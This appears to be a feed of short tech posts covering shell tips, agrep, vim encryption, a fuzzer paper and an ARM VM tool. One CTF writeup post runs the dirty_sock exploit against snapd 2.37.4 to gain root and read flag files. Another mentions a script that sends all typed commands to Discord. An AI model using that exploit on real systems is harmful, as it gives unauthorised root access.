I am excited to announce a new project, Hacker AI, an AI-powered tool that detects vulnerabilities in source code.
Check it out at hacker-ai.online.
Feedback is greatly appreciated.
In #linux shell <Ctrl+u> clears the line!
$ whatever
$ whatever<Ctrl+u>
$
Tips: When you typo on password just <Ctrl+u> to reset the password entry. Works for tty, sudo, #bash, #zsh...
Have a nice weekend. @nixcraft@commandlinefu@climagic@unixmen
Today learn agrep => approximative grep.
Based on Levenshtein distances, it's possible to search for words looking alike a word.
linux.die.net/man/1/agrep
I'm using it for my personal note taking tools. Knowledge organisation is powerfull!! Cc @nixcraft@climagic
Use #vim to encypt your files with the :X command, don't forget to add 'set cm=blowfish2' to your vimrc for a better encryption. thx @nixcraft cc @MasteringVim#tweetips
Last night I wrote magic amazing bash things that you want to try!!
It automatically sends all typed command to your discord channel. I use this so my students can have a realtime copy of all my typed commands!
gist.github.com/0a723189610837… cc @nixcraft@climagic
Writeup of how to get root in ten minutes and get all CTF flags.
$ snap version
2.37.4
$ ./dirty_sockv2.py # @init_string github
$ su dirty_sock
$ sudo -i
# id
uid=0(root) gid=0(root) groups=0(root)
# find -iname "flag*" -exec echo {} ';' -exec cat '{}' \;
*** flags ***
Angora a new fuzzer that uses gradient descent instead theorem prover, it's way more efficient than AFL. Angora found 6, 52, 29, 40 and 48
new bugs in file, jhead, nm, objdump and size, respectively. arxiv.org/abs/1803.01307#NewPaper
arm_now is an easy way to instantly setup and start a virtual machine within the cpu architecture that you want. ARM, PowerPc, MIPS, mios2, sh4, x86... github.com/nongiach/arm_n… cc @therealsaumil